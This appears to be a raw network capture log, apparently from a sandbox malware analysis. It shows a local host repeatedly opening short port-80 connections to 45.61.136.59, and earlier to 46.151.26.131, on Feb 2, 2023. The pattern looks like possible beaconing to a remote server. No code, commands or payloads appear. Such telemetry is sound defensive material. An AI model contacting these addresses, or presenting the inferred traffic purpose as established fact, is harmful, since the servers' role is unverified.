                                                                                                                                            Feb 2, 2023 21:16:56.864023924 CET4969780192.168.2.446.151.26.131
                                                                                                                                            Feb 2, 2023 21:16:56.864028931 CET804969746.151.26.131192.168.2.4
                                                                                                                                            Feb 2, 2023 21:16:56.864057064 CET804969746.151.26.131192.168.2.4
                                                                                                                                            Feb 2, 2023 21:16:56.864084005 CET4969780192.168.2.446.151.26.131
                                                                                                                                            Feb 2, 2023 21:16:56.864084959 CET804969746.151.26.131192.168.2.4
                                                                                                                                            Feb 2, 2023 21:16:56.864114046 CET804969746.151.26.131192.168.2.4
                                                                                                                                            Feb 2, 2023 21:16:56.864137888 CET804969746.151.26.131192.168.2.4
                                                                                                                                            Feb 2, 2023 21:16:56.864141941 CET4969780192.168.2.446.151.26.131
                                                                                                                                            Feb 2, 2023 21:16:56.864197016 CET4969780192.168.2.446.151.26.131
                                                                                                                                            Feb 2, 2023 21:16:56.864265919 CET4969780192.168.2.446.151.26.131
                                                                                                                                            Feb 2, 2023 21:16:56.890471935 CET804969746.151.26.131192.168.2.4
                                                                                                                                            Feb 2, 2023 21:16:58.235763073 CET4969880192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:16:58.403461933 CET804969845.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:16:58.403604984 CET4969880192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:16:58.404550076 CET4969880192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:16:58.571862936 CET804969845.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:16:58.571964979 CET804969845.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:16:58.622054100 CET4969880192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:16:58.688285112 CET4969880192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:16:58.753825903 CET4969980192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:16:58.855593920 CET804969845.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:16:58.856987000 CET4969880192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:16:58.927694082 CET804969945.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:16:58.928282976 CET4969980192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:16:58.928596973 CET4969980192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:16:59.102287054 CET804969945.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:16:59.102349043 CET804969945.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:16:59.153364897 CET4969980192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:16:59.232472897 CET4969980192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:16:59.342793941 CET4970080192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:16:59.406337976 CET804969945.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:16:59.406593084 CET4969980192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:16:59.510654926 CET804970045.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:16:59.510767937 CET4970080192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:16:59.511133909 CET4970080192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:16:59.678833961 CET804970045.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:16:59.679017067 CET804970045.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:16:59.731513023 CET4970080192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:16:59.827285051 CET4970080192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:16:59.916287899 CET4970180192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:16:59.995074034 CET804970045.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:16:59.995171070 CET4970080192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:00.081136942 CET804970145.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:00.081237078 CET4970180192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:00.085071087 CET4970180192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:00.249820948 CET804970145.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:00.249947071 CET804970145.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:00.294070959 CET4970180192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:00.360347986 CET4970180192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:00.443315983 CET4970280192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:00.525362968 CET804970145.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:00.525520086 CET4970180192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:00.608139992 CET804970245.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:00.610759974 CET4970280192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:00.614211082 CET4970280192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:00.780864000 CET804970245.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:00.781061888 CET804970245.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:00.825342894 CET4970280192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:00.996612072 CET4970280192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:01.101013899 CET4970380192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:01.161731958 CET804970245.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:01.161823034 CET4970280192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:01.265793085 CET804970345.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:01.266838074 CET4970380192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:01.267112017 CET4970380192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:01.433619022 CET804970345.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:01.433665037 CET804970345.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:01.481668949 CET4970380192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:01.672087908 CET4970380192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:01.714665890 CET4970480192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:01.838772058 CET804970345.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:01.838931084 CET4970380192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:01.879275084 CET804970445.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:01.879451990 CET4970480192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:01.885380030 CET4970480192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:02.050162077 CET804970445.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:02.050287008 CET804970445.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:02.091169119 CET4970480192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:02.248334885 CET4970480192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:02.401602983 CET4970580192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:02.413043976 CET804970445.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:02.414088011 CET4970480192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:02.566262960 CET804970545.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:02.566436052 CET4970580192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:02.566757917 CET4970580192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:02.731204033 CET804970545.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:02.731314898 CET804970545.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:02.778660059 CET4970580192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:02.882785082 CET4970580192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:02.987726927 CET4970680192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:03.047681093 CET804970545.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:03.047810078 CET4970580192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:03.161870003 CET804970645.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:03.162019014 CET4970680192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:03.163587093 CET4970680192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:03.337753057 CET804970645.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:03.338604927 CET804970645.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:03.388156891 CET4970680192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:03.455194950 CET4970680192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:03.629323959 CET804970645.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:03.630858898 CET4970680192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:03.885171890 CET4970780192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:04.050370932 CET804970745.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:04.051498890 CET4970780192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:04.080080986 CET4970780192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:04.245064020 CET804970745.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:04.245735884 CET804970745.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:04.294414997 CET4970780192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:05.491875887 CET4970780192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:05.656856060 CET804970745.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:05.657032013 CET4970780192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:05.940457106 CET4970880192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:06.108300924 CET804970845.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:06.108500957 CET4970880192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:06.110502005 CET4970880192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:06.278315067 CET804970845.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:06.278728008 CET804970845.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:06.440372944 CET4970880192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:06.606065035 CET4970980192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:06.608278036 CET804970845.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:06.608387947 CET4970880192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:06.770843983 CET804970945.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:06.771635056 CET4970980192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:06.774797916 CET4970980192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:06.939201117 CET804970945.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:06.939448118 CET804970945.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:07.029072046 CET4970980192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:07.052891016 CET4970980192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:07.132215023 CET4971080192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:07.217541933 CET804970945.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:07.217828989 CET4970980192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:07.297461987 CET804971045.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:07.298486948 CET4971080192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:07.302376986 CET4971080192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:07.467024088 CET804971045.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:07.467369080 CET804971045.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:07.529143095 CET4971080192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:07.814129114 CET4971080192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:07.858755112 CET4971180192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:07.979383945 CET804971045.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:07.979937077 CET4971080192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:08.032767057 CET804971145.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:08.034120083 CET4971180192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:08.034463882 CET4971180192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:08.208369017 CET804971145.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:08.208429098 CET804971145.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:08.294750929 CET4971180192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:08.497306108 CET4971180192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:08.541600943 CET4971280192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:08.671475887 CET804971145.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:08.671884060 CET4971180192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:08.709119081 CET804971245.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:08.709755898 CET4971280192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:08.710021973 CET4971280192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:08.877341032 CET804971245.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:08.877590895 CET804971245.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:08.919831038 CET4971280192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:09.110821962 CET4971280192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:09.149874926 CET4971380192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:09.278526068 CET804971245.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:09.278657913 CET4971280192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:09.314912081 CET804971345.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:09.315299988 CET4971380192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:09.315639973 CET4971380192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:09.481960058 CET804971345.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:09.482002974 CET804971345.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:09.685981989 CET4971380192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:09.760016918 CET4971380192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:09.898976088 CET4971480192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:09.924941063 CET804971345.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:09.925116062 CET4971380192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:10.067009926 CET804971445.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:10.067138910 CET4971480192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:10.118194103 CET4971480192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:10.286223888 CET804971445.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:10.286283016 CET804971445.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:10.408524036 CET4971480192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:10.444251060 CET4971580192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:10.576531887 CET804971445.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:10.577033043 CET4971480192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:10.609138966 CET804971545.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:10.611332893 CET4971580192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:10.611542940 CET4971580192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:10.776134014 CET804971545.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:10.776200056 CET804971545.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:10.870819092 CET4971580192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:11.105751038 CET4971580192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:11.147195101 CET4971680192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:11.270653963 CET804971545.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:11.270828009 CET4971580192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:11.312155962 CET804971645.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:11.316247940 CET4971680192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:11.316499949 CET4971680192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:11.481163979 CET804971645.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:11.481430054 CET804971645.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:11.530613899 CET4971680192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:11.594734907 CET4971680192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:11.630498886 CET4971780192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:11.759937048 CET804971645.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:11.760049105 CET4971680192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:11.797019005 CET804971745.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:11.800368071 CET4971780192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:11.800641060 CET4971780192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:11.965584040 CET804971745.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:11.965662956 CET804971745.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:12.185767889 CET4971780192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:12.244689941 CET4971780192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:12.292560101 CET4971880192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:12.409948111 CET804971745.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:12.410490990 CET4971780192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:12.457544088 CET804971845.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:12.457679987 CET4971880192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:12.457989931 CET4971880192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:12.623017073 CET804971845.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:12.623527050 CET804971845.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:12.685902119 CET4971880192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:12.964010000 CET4971880192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:13.000416040 CET4971980192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:13.129376888 CET804971845.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:13.129451036 CET4971880192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:13.165301085 CET804971945.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:13.165466070 CET4971980192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:13.165718079 CET4971980192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:13.330385923 CET804971945.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:13.330622911 CET804971945.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:13.420182943 CET4971980192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:13.594470024 CET4971980192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:13.635795116 CET4972080192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:13.759475946 CET804971945.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:13.762141943 CET4971980192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:13.800736904 CET804972045.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:13.800899029 CET4972080192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:13.801273108 CET4972080192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:13.965790987 CET804972045.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:13.966052055 CET804972045.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:14.185975075 CET4972080192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:14.361239910 CET4972080192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:14.406552076 CET4972180192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:14.526276112 CET804972045.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:14.526416063 CET4972080192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:14.574632883 CET804972145.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:14.574956894 CET4972180192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:14.575592041 CET4972180192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:14.743359089 CET804972145.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:14.743505001 CET804972145.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:14.795332909 CET4972180192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:14.982256889 CET4972180192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:15.018630028 CET4972280192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:15.150837898 CET804972145.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:15.151045084 CET4972180192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:15.183538914 CET804972245.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:15.183733940 CET4972280192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:15.184092045 CET4972280192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:15.348773956 CET804972245.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:15.349616051 CET804972245.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:15.404743910 CET4972280192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:15.497488976 CET4972280192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:15.533886909 CET4972380192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:15.662522078 CET804972245.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:15.662748098 CET4972280192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:15.702138901 CET804972345.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:15.702363014 CET4972380192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:15.702981949 CET4972380192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:15.870944023 CET804972345.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:15.871002913 CET804972345.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:15.920394897 CET4972380192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:16.031244993 CET4972380192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:16.068018913 CET4972480192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:16.199465036 CET804972345.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:16.199906111 CET4972380192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:16.232923985 CET804972445.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:16.234972954 CET4972480192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:16.235322952 CET4972480192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:16.400248051 CET804972445.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:16.400310040 CET804972445.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:16.451761007 CET4972480192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:16.674510002 CET4972480192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:16.716173887 CET4972580192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:16.839545965 CET804972445.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:16.839651108 CET4972480192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:16.881350994 CET804972545.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:16.881508112 CET4972580192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:16.881808996 CET4972580192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:17.046412945 CET804972545.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:17.046669006 CET804972545.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:17.092401981 CET4972580192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:17.325120926 CET4972580192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:17.363451004 CET4972680192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:17.490072966 CET804972545.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:17.491055012 CET4972580192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:17.528178930 CET804972645.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:17.528301001 CET4972680192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:17.528629065 CET4972680192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:17.693074942 CET804972645.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:17.693311930 CET804972645.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:17.748733044 CET4972680192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:17.815763950 CET4972680192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:17.873079062 CET4972780192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:17.980669022 CET804972645.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:17.982860088 CET4972680192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:18.040797949 CET804972745.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:18.044887066 CET4972780192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:18.045264959 CET4972780192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:18.213095903 CET804972745.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:18.213145018 CET804972745.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:18.264374018 CET4972780192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:18.332317114 CET4972780192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:18.368330956 CET4972880192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:18.500410080 CET804972745.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:18.500674963 CET4972780192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:18.533158064 CET804972845.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:18.536393881 CET4972880192.168.2.445.61.136.59
